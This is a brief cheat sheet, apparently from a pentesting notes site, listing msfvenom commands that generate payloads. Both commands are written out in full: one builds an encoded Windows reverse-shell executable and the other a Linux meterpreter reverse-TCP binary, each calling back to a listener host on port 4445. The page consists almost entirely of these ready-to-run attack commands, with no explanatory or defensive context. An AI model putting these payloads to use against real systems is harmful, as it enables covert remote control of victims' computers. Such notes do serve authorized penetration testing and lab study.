msfvenom

Generate payloads

windows binary

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.123 LPORT=4445 -e x86/shikata_ga_nai -f exe -o payload.exe

other payload: windows/meterpreter/reverse_tcp

Linux binary

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=10.9.1.74 LPORT=4445 -f elf -o payload.elf

Last updated